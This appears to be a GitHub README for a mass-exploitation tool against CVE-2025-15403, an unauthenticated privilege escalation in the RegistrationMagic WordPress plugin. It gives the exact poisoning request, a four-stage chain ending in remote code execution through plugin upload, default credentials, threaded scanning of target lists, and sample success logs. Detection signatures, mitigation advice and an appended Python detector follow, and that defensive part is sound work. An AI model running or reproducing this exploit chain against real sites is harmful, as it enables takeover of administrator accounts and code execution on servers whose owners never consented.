Nxploited/CVE-2025-15403

GitHub: Nxploited/CVE-2025-15403

Exploitation and verification tool for the unauthenticated privilege escalation vulnerability in the RegistrationMagic plugin.

Stars: 0 | Forks: 0

# CVE-2025-15403 RegistrationMagic <= 6.0.7.1 - Unauthenticated Privilege Escalation (via admin_order)
[![Telegram](https://img.shields.io/badge/Telegram-KNxploited-2CA5E0?style=for-the-badge&logo=telegram&logoColor=white)](https://t.me/KNxploited) [![CVE](https://img.shields.io/badge/CVE-2025--15403-critical?style=for-the-badge&logo=cve&logoColor=white&color=CC0000)](https://www.cve.org/CVERecord?id=CVE-2025-15403) [![CVSS](https://img.shields.io/badge/CVSS-9.8%20CRITICAL-red?style=for-the-badge)](https://nvd.nist.gov/vuln/detail/CVE-2025-15403) [![Python](https://img.shields.io/badge/Python-3.8%2B-blue?style=for-the-badge&logo=python&logoColor=white)](https://python.org) [![License](https://img.shields.io/badge/License-Educational%20Only-yellow?style=for-the-badge)](#%EF%B8%8F-disclaimer)
## 🧠 Overview

**CVE-2025-15403** is a **CVSS 9.8 Critical** privilege escalation vulnerability in the **RegistrationMagic** WordPress plugin. The flaw lives in the plugin's `add_menu` function and is exposed through the unauthenticated `rm_user_exists` AJAX action. An attacker injects an **empty slug** into the `order` parameter and combines it with the `enable_admin_order=yes` flag to manipulate the plugin's internal menu-generation logic. When the admin menu is subsequently built, the plugin silently calls `add_cap('manage_options')` on the target role, elevating any subscriber-level account to **full administrator privileges**.

| Field | Details |
|------------------------|---------------------------------------------------------|
| **CVE ID** | CVE-2025-15403 |
| **Plugin** | RegistrationMagic |
| **Slug** | `registrationmagic` / `custom-registration-form-builder-with-submission-manager` |
| **Affected versions** | All versions **6.0.7.1** and below |
| **Vulnerability type** | Unauthenticated privilege escalation |
| **Attack requirements** | AJAX stage: none. Attack: a subscriber account |
| **Attack vector** | Network |
| **CVSS 3.1 score** | **9.8 Critical** |
| **CVSS vector** | `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **CNA** | Wordfence |
| **Impact** | Full WordPress administrator takeover |
| **Researcher** | Nxploited |

## 💀 Vulnerability Deep Dive

The root cause is that `add_menu` is reachable through the unauthenticated `rm_user_exists` action, and the `admin_order` identifier is never checked for an empty value:

```
// Registered with no capability check
add_action('wp_ajax_nopriv_rm_user_exists', [$this, 'rm_user_exists_handler']);

public function rm_user_exists_handler() {
    $slug     = sanitize_text_field($_POST['rm_slug']);
    $order    = $_POST['order'];               // ← User-controlled, NOT sanitized
    $role_key = /* derived from POST */;
    $enable   = $_POST['enable_admin_order'];

    if ($slug === 'rm_options_admin_menu' && $enable === 'yes') {
        // Stores attacker-controlled order into plugin options
        update_option('rm_admin_order', $order); // e.g. ",menu1" → empty first slug
    }
}

// Later, when admin menu is being built...
public function add_menu() {
    $order = get_option('rm_admin_order');     // ← Poisoned by attacker
    $slugs = explode(',', $order);
    foreach ($slugs as $slug) {
        if (empty($slug)) {
            // Empty slug triggers unconditional capability grant
            $role->add_cap('manage_options');  // ← FULL ADMIN CAPABILITY ADDED
        }
    }
}
```

**Why this is serious:**

- `wp_ajax_nopriv_*` means the option can be poisoned **without any authentication**
- The empty slug in `order=` passes the `empty()` check and triggers `add_cap('manage_options')`
- `manage_options` is the highest WordPress capability, equivalent to administrator
- Any existing subscriber account gains full administrator rights the next time the admin menu is loaded
- The AJAX stage needs no prior authentication, so the whole chain has a **near-zero barrier to entry**

## ⚔️ Attack Chain

```
╔════════════════════════════════════════════════════════════════╗
║ STAGE 1 — Unauthenticated Option Poisoning                     ║
╚════════════════════════════════════════════════════════════════╝
POST /wp-admin/admin-ajax.php
  action             = rm_user_exists
  rm_slug            = rm_options_admin_menu
  order              = ,menu1        ← empty first element = empty slug
  _Subscriber        = 1             ← target role key
  restore            = false
  enable_admin_order = yes

Response: HTTP 200 (any non-blocked response = option poisoned)
        ↓
Plugin stores order=",menu1" into wp_options
        ↓
Next admin menu build triggers add_cap('manage_options') on Subscriber role

╔════════════════════════════════════════════════════════════════╗
║ STAGE 2 — Account Acquisition (Subscriber)                     ║
╚════════════════════════════════════════════════════════════════╝
Option A — Register via the site's registration form (Mode 0):
  GET  /wp-login.php?action=register   → smart form detection
  POST                                 → create subscriber account
  Credentials: NXploited / xplpass123

Option B — Use an existing subscriber account.

╔════════════════════════════════════════════════════════════════╗
║ STAGE 3 — Login + Capability Harvest                           ║
╚════════════════════════════════════════════════════════════════╝
POST /wp-login.php
  log = NXploited
  pwd = xplpass123
        ↓
Subscriber account now carries manage_options → full admin panel accessible

╔════════════════════════════════════════════════════════════════╗
║ STAGE 4 — Deep Verification & RCE via Plugin Upload            ║
╚════════════════════════════════════════════════════════════════╝
GET  /wp-admin/                                → Admin dashboard accessible ✔️
GET  /wp-admin/plugin-install.php              → Plugin install page accessible ✔️
POST /wp-admin/update.php?action=upload-plugin
     pluginzip = Nxploited.zip                 → Plugin uploaded & executed ✔️
GET  /wp-content/plugins/Nxploited/hello.php
     Response contains "Nxploited"             → CONFIRMED RCE ✔️
```

## 🎯 Operating Modes

This exploit suite provides **three independent modes** covering the full attack lifecycle:

| Mode | Name | Description |
|------|-----------------------------|--------------------------------------------------------------------------|
| `0` | **Register only** | Smart WordPress form detection + subscriber account registration |
| `1` | **Exploit only** | Fire the unauthenticated AJAX primitive to poison `admin_order` |
| `2` | **Exploit + Login + Verify** | Full chain: primitive → login → admin dashboard → plugin install → RCE |

## ⚙️ Requirements

```
pip install requests colorama urllib3
```

| Dependency | Purpose |
|----------------------------|------------------------------------------------------------|
| `requests` | HTTP sessions, cookie handling, redirect following |
| `colorama` | Cross-platform colored terminal output |
| `urllib3` | SSL warning suppression for self-signed certificates |
| `concurrent.futures` | Thread pool for high-throughput multi-target scanning |
| `zipfile` | In-memory test plugin ZIP generation for RCE verification |
| `html.parser` | Smart registration form detection and field extraction |

## 📂 File Structure

```
CVE-2025-15403/
├── CVE-2025-15403.py                # Main exploit suite
├── list.txt                         # Target URLs — one per line
│
├── rm_register_results.txt          # Mode 0: successful registrations
├── rm_exploit_results.txt           # Mode 1 & 2: primitive fire log
├── rm_admin_verify.txt              # Mode 2: login + admin verification log
├── rm_plugin_uploads.txt            # Mode 2: plugin upload attempt log
│
├── rm_admin_dashboard_success.txt   # ✔ Sites where admin dashboard confirmed
├── rm_plugin_install_access.txt     # ✔ Sites where plugin-install page accessible
└── rm_plugin_rce_success.txt        # ✔ Sites where RCE via plugin upload confirmed
```

## 🚀 Usage

### Step 1 — Prepare targets

Create `list.txt` with one URL or hostname per line:

```
https://target1.com
https://target2.com
http://target3.com/wordpress
target4.com
```

### Step 2 — Run the exploit suite

```
python CVE-2025-15403.py
```

All parameters are prompted interactively. Example session for **Mode 2**:

```
Select mode (0 = register, 1 = exploit, 2 = exploit+verify) [0]: 2
Targets list file (one host/URL per line) [list.txt]: list.txt
Threads (concurrent sites) [5]: 20
HTTP timeout (seconds) [10]: 12
Role key to escalate (e.g. _Subscriber, _Editor) [_Subscriber]: _Subscriber
Username to login with (e.g. NXploited) [NXploited]: NXploited
Password for that user [xplpass123]: xplpass123
Output file for admin verification [rm_admin_verify.txt]: rm_admin_verify.txt
Output file for plugin upload tests [rm_plugin_uploads.txt]: rm_plugin_uploads.txt
Send primitive before login in mode 2? (yes/no) [yes]: yes
```

### Step 3 — Monitor live output

```
[14:31:01] info    | Mode 2: Exploit + Login + Deep Verify | Targets: 200
[14:31:02] SESSION | https://target.com  | PRIM: OK   | REG: SKIP | LOGIN: OK   | ACCESS: admin_full_plugin_upload
[14:31:03] SESSION | https://target2.com | PRIM: OK   | REG: SKIP | LOGIN: FAIL | ACCESS: bad_credentials
[14:31:04] SESSION | https://target3.com | PRIM: FAIL | REG: SKIP | LOGIN: -    | ACCESS: NO HIT
```

| Color | Tag | Meaning |
|-------------|---------|---------------------------------------------------|
| 🔵 Cyan | `info` | Informational: mode start, configuration details |
| 🟢 Green | `ok` | Full success: admin access or RCE confirmed |
| 🟡 Yellow | `warn` | Partial result: primitive succeeded but login failed, etc. |
| 🔴 Red | `err` | Hard failure: file not found, exception, access denied |

## 📊 Output File Reference

### `rm_admin_dashboard_success.txt`

Sites where the subscriber account successfully reached `/wp-admin/` after escalation:

```
[2025-04-18 14:31:02] https://victim.com - NXploited:xplpass123 - ADMIN_DASHBOARD - verify_admin_dashboard
```

### `rm_plugin_install_access.txt`

Sites where the plugin install page was accessible (confirming the `manage_options` capability):

```
[2025-04-18 14:31:02] https://victim.com - NXploited:xplpass123 - PLUGIN_INSTALL_ACCESS=https://victim.com/wp-admin/plugin-install.php?tab=upload - plugin-install-access
```

### `rm_plugin_rce_success.txt`

Sites where the test plugin was uploaded and executed, i.e. **confirmed RCE**:

```
[2025-04-18 14:31:05] https://victim.com - NXploited:xplpass123 - PLUGIN_RCE=https://victim.com/wp-content/plugins/Nxploited/hello.php - AdminUpload
```

## 🖥️ Script Parameter Reference

| Parameter | Default | Description |
|--------------------------|---------------------|--------------------------------------------------|
| Mode | `0` | Attack mode: 0 = register, 1 = exploit, 2 = full chain |
| Targets file | `list.txt` | File containing the target URLs |
| Threads | `5` (no hard cap) | Number of concurrent thread-pool workers |
| Timeout | `10` seconds | HTTP timeout per request |
| Role key | `_Subscriber` | WordPress role to escalate (`_Editor`, `_Author`, etc.) |
| Username | `NXploited` | Account name used for registration / login |
| Password | `xplpass123` | Account password |
| Send primitive | `yes` | Whether to fire the AJAX primitive before login in mode 2 |

## 🔬 Verification Logic (Mode 2)

Mode 2 performs a **three-stage progressive verification**; each stage is independent and writes to its own result file:

```
Stage 1 — Admin Dashboard
  GET /wp-admin/
  GET /wp-admin/index.php
  GET /wp-admin/users.php
  Check for: "dashboard", "adminmenu", "manage_options", "plugins.php"
  ✔ → writes to rm_admin_dashboard_success.txt

Stage 2 — Plugin Install Page Access
  GET /wp-admin/plugin-install.php
  GET /wp-admin/plugin-install.php?tab=upload
  Check for: "upload-plugin", "plugin-upload-form", "pluginzip"
  ✔ → writes to rm_plugin_install_access.txt

Stage 3 — Real Plugin Upload + Execution (RCE Proof)
  Extract _wpnonce from plugin-install page
  POST /wp-admin/update.php?action=upload-plugin
       pluginzip = Nxploited.zip (in-memory generated)
  GET /wp-content/plugins/Nxploited/hello.php
  Check response body contains "Nxploited"
  ✔ → writes to rm_plugin_rce_success.txt
```

Every passed stage is **recorded independently**: a target that passes Stage 1 but fails Stage 3 is still captured in `rm_admin_dashboard_success.txt`.

## 🔍 Smart Registration Engine (Mode 0)

Mode 0 uses a custom HTML form parser that automatically detects and submits WordPress registration forms, including custom RegistrationMagic forms:

```
Probe URLs (in order):
  /wp-login.php?action=register
  /register/
  /signup/
  /wp-signup.php
  /wp-login.php

For each page:
  → Parse all <form> elements
  → Score each form (0–200 points):
      +100  "user_login" + "user_email" fields present
      + 60  Email + username-like fields present
      + 30  rm_* prefixed input fields (RegistrationMagic specific)
      + 20  form id/class contains "register" / "signup"
      + 10  Page body mentions "register" / "sign up"
  → Submit highest-scoring form (threshold: 40+)
  → Verify success via response body / redirect URL
```

## 📊 Detection Signatures

Network signature produced by exploitation, for defenders and WAF/IDS rule authors:

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=rm_user_exists&rm_slug=rm_options_admin_menu&order=%2Cmenu1&_Subscriber=1&restore=false&enable_admin_order=yes
```

**WAF / IDS rule (pseudocode):**

```
IF request.method == POST
   AND request.path == "/wp-admin/admin-ajax.php"
   AND request.body CONTAINS "rm_user_exists"
   AND request.body CONTAINS "rm_options_admin_menu"
   AND request.body CONTAINS "enable_admin_order=yes"
THEN BLOCK + ALERT (Privilege Escalation Attempt — CVE-2025-15403)
```

**Additional detection — option poisoning:**

```
Monitor wp_options table:
  IF option_name = "rm_admin_order" AND option_value STARTS WITH ","
  THEN ALERT — potential CVE-2025-15403 exploitation
```

## 🛡️ Mitigation & Remediation

If you are a **site owner, developer or defender**, act immediately:

- ✅ **Update** RegistrationMagic to a version **above 6.0.7.1**
- ✅ **Deactivate and remove** the plugin until a patched version is confirmed
- ✅ **Audit** the `wp_options` table: check the `rm_admin_order` value for suspicious entries (for example, values beginning with `,`)
- ✅ **Audit** all WordPress users: remove or demote any unauthorized account holding the `manage_options` capability
- ✅ **Add capability checks** to every `wp_ajax_nopriv_*` handler: never expose option writes without authentication
- ✅ **Validate and sanitize** the `order` parameter: reject values that contain empty slug segments
- ✅ **Block** (at the WAF layer) unauthenticated POST requests to `admin-ajax.php` that contain `rm_options_admin_menu`
- ✅ **Monitor** WordPress and server logs for `rm_user_exists` AJAX calls from unauthenticated sources

## ⚠️ Disclaimer

```
THIS TOOL IS PROVIDED STRICTLY FOR EDUCATIONAL, AUTHORIZED PENETRATION TESTING,
AND SECURITY RESEARCH PURPOSES ONLY.

By downloading, executing, or modifying this script, you explicitly agree:

  • You hold EXPLICIT, WRITTEN authorization from the owner of every target
    system you test. No exceptions. No assumptions.
  • You are operating within a formally scoped, authorized penetration testing
    engagement or a controlled lab environment you own.
  • You will NOT deploy this tool against any system, network, or infrastructure
    without documented legal permission.
  • Nxploited and all contributors bear ZERO liability for unauthorized use,
    data loss, system damage, legal proceedings, or criminal prosecution arising
    from the use of this tool in any form.

Unauthorized use of this exploit constitutes a criminal offense under:
  — Computer Fraud and Abuse Act (CFAA), USA
  — Computer Misuse Act (CMA), UK
  — EU Directive 2013/40/EU on Attacks Against Information Systems
  — Saudi Arabia's Anti-Cyber Crime Law (No. M/17)
  — And all equivalent national and international cybercrime legislation.

USE RESPONSIBLY. HACK ETHICALLY. DISCLOSE RESPONSIBLY.
```

## 👤 Author

| | |
|---------------|-----------------------------------------------------------|
| **Handle** | Nxploited |
| **Telegram** | [@KNxploited](https://t.me/KNxploited) |
| **GitHub** | [github.com/Nxploited](https://github.com/Nxploited) |
Crafted by Nxploited · Authorized security research only · CVSS 9.8 Critical
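As an added defender-side example (the editor's code, not part of the Nxploited tool or of the RegistrationMagic plugin), the following Python turns the Detection Signatures section into runnable checks: a request matcher equivalent to the WAF/IDS pseudocode, an `rm_admin_order` audit that generalizes the `wp_options` monitor from "starts with `,`" to "contains any empty segment" (since any empty segment reaches the `add_cap('manage_options')` branch), and the empty-segment validation the remediation list asks plugin authors to apply to `order`. The request log lines, the option rows and the helper names (`scan_request_log`, `audit_rm_admin_order`, `validate_order`) are constructed for this illustration.

```python
"""Defender-side checks for CVE-2025-15403 (added example, not the
Nxploited tool's code). Sample data below is constructed."""
import re
from urllib.parse import parse_qs

AJAX_PATH = "/wp-admin/admin-ajax.php"


def is_cve_2025_15403_request(method: str, path: str, body: str) -> bool:
    """Parsed-parameter form of the README's WAF/IDS rule: POST to
    admin-ajax.php with action=rm_user_exists, rm_slug=rm_options_admin_menu
    and enable_admin_order=yes. Parsing the body (instead of substring
    matching) also catches URL-encoded variants of the same parameters."""
    if method.upper() != "POST" or path.split("?", 1)[0] != AJAX_PATH:
        return False
    params = parse_qs(body, keep_blank_values=True)
    return (
        params.get("action") == ["rm_user_exists"]
        and params.get("rm_slug") == ["rm_options_admin_menu"]
        and params.get("enable_admin_order") == ["yes"]
    )


def order_has_empty_slug(order: str) -> bool:
    """True when a comma-separated menu order contains an empty segment
    (",menu1", "menu1,,menu2", "menu1,"): the condition that makes the
    vulnerable add_menu() loop call add_cap('manage_options')."""
    return any(seg.strip() == "" for seg in order.split(","))


SLUG_RE = re.compile(r"[a-z0-9_-]+")


def validate_order(order: str) -> bool:
    """Strict rule a patched handler (or a WAF) could apply before the value
    is stored: non-empty, no empty segments, slug characters only.
    This is the editor's suggested rule, not the vendor's fix."""
    return bool(order) and all(SLUG_RE.fullmatch(seg) for seg in order.split(","))


# Constructed request log, one request per line: "METHOD PATH | BODY".
SAMPLE_REQUEST_LOG = """\
POST /wp-admin/admin-ajax.php | action=rm_user_exists&rm_slug=rm_options_admin_menu&order=%2Cmenu1&_Subscriber=1&restore=false&enable_admin_order=yes
POST /wp-admin/admin-ajax.php | action=heartbeat&_nonce=abc123
GET /wp-login.php?action=register | 
POST /wp-admin/admin-ajax.php | action=rm_user_exists&rm_slug=rm_options_admin_menu&order=menu1%2Cmenu2&enable_admin_order=no
"""


def scan_request_log(log_text: str) -> list:
    """Return one finding per request matching the signature, with the
    decoded `order` value so an analyst can see the empty slug directly."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        if " | " not in line:
            continue
        request, _, body = line.partition(" | ")
        method, _, path = request.partition(" ")
        if is_cve_2025_15403_request(method, path, body):
            order = parse_qs(body, keep_blank_values=True).get("order", [""])[0]
            findings.append({"line": lineno, "order": order,
                             "empty_slug": order_has_empty_slug(order)})
    return findings


# Constructed wp_options rows as (option_name, option_value) pairs.
SAMPLE_OPTIONS = [
    ("siteurl", "https://example.test"),
    ("rm_admin_order", ",menu1"),       # poisoned: leading comma = empty slug
    ("rm_admin_order", "menu1,menu2"),  # benign menu layout
]


def audit_rm_admin_order(rows) -> list:
    """Return every rm_admin_order value that contains an empty segment."""
    return [value for name, value in rows
            if name == "rm_admin_order" and order_has_empty_slug(value)]


if __name__ == "__main__":
    for f in scan_request_log(SAMPLE_REQUEST_LOG):
        print(f"ALERT log line {f['line']}: CVE-2025-15403 attempt, "
              f"order={f['order']!r}, empty_slug={f['empty_slug']}")
    for value in audit_rm_admin_order(SAMPLE_OPTIONS):
        print(f"ALERT wp_options: suspicious rm_admin_order={value!r}")
```

Run as a script it flags only the first log line (the others are a benign heartbeat, a GET, and a request with `enable_admin_order=no`) and only the `,menu1` option row. `validate_order` is deliberately stricter than the detection rule: it rejects the whole value on any empty or non-slug segment, which is the behavior the remediation list recommends for the `order` parameter.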
Tags: add_cap, Admin Order, BurpSuite integration, CRITICAL, CVE-2025-15403, CVSS 9.8, manage_options, Privilege Escalation, RegistrationMagic, web report viewer, WordPress, WordPress plugin, protocol analysis, threat simulation, security vulnerability, plugin vulnerability, unauthenticated vulnerability, privilege escalation, vulnerability analysis, vulnerability disclosure, menu injection, path probing, reverse-engineering tool